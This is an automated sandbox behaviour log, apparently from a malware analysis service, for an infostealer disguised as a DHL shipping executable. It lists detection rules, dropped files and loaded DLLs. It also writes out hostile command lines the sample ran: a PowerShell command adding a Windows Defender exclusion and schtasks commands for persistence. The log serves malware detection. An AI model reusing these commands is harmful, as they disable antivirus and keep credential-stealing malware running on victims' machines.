                      Source: 7.2.qmUxKv.exe.48aa5c0.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.DHL_1003671162.exe.3a09970.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: DHL_1003671162.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: qmUxKv.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, v9Lsz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, VFo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, 5FJ0H20tobu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, NtdoTGO.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, XBsYgp.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, AwxUa2Na.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, 19C9FfZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, 19C9FfZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, soCD8XkwU.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.3a44990.6.raw.unpack, soCD8XkwU.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, piTvKODFSX0jcR75aU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, piTvKODFSX0jcR75aU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/16@1/1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile created: C:\Users\user\AppData\Roaming\qmUxKv.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1432:120:WilError_03
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3999.tmpJump to behavior
                      Source: DHL_1003671162.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DHL_1003671162.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DHL_1003671162.exeVirustotal: Detection: 57%
                      Source: DHL_1003671162.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile read: C:\Users\user\Desktop\DHL_1003671162.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\qmUxKv.exe C:\Users\user\AppData\Roaming\qmUxKv.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Users\user\AppData\Roaming\qmUxKv.exe "C:\Users\user\AppData\Roaming\qmUxKv.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qmUxKv.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp3999.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeProcess created: C:\Users\user\Desktop\DHL_1003671162.exe "C:\Users\user\Desktop\DHL_1003671162.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp46C8.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeProcess created: C:\Users\user\AppData\Roaming\qmUxKv.exe "C:\Users\user\AppData\Roaming\qmUxKv.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp6C70.tmp"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qmUxKv" /XML "C:\Users\user\AppData\Local\Temp\tmp8A0A.tmp"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
